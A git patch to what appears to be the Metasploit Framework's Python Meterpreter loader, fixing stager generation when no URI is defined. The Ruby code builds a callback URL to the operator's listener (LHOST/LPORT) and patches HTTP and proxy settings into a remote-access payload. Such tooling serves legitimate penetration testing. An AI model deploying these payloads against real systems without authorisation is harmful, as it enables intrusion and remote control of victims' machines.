From 37ab771ca9d2fbc24c55da443cbb8ead997a161d Mon Sep 17 00:00:00 2001
From: Brent Cook <busterb@gmail.com>
Date: Thu, 21 Sep 2017 03:02:13 -0500
Subject: [PATCH] uri is not always defined, fix python stager generation

---
 .../core/payload/python/meterpreter_loader.rb | 42 ++++++++++---------
 1 file changed, 22 insertions(+), 20 deletions(-)

diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
index 7f4935bc4b..11cb72d6c7 100644
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -105,28 +105,30 @@ module Payload::Python::MeterpreterLoader
     # The callback URL can be different to the one that we're receiving from the interface
     # so we need to generate it
     # TODO: move this to somewhere more common so that it can be used across payload types
-    uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}"
-    callback_url = [
-      opts[:url].split(':')[0],
-      '://',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
-      ':',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
-      ds['LURI'].to_s,
-      uri,
-      '/'
-    ].join('')
+    unless opts[:url].to_s == ''
+      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+      callback_url = [
+        opts[:url].to_s.split(':')[0],
+        '://',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+        ':',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+        ds['LURI'].to_s,
+        uri,
+        '/'
+      ].join('')
 
-    # patch in the various payload related configuration
-    met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
-    met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
-    met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
-    met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
-    met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+      # patch in the various payload related configuration
+      met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
+      met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+      met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+      met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+      met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
 
-    if http_proxy_host.to_s != ''
-      proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
-      met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+      if http_proxy_host.to_s != ''
+        proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
+        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+      end
     end
 
     # patch in any optional stageless tcp socket setup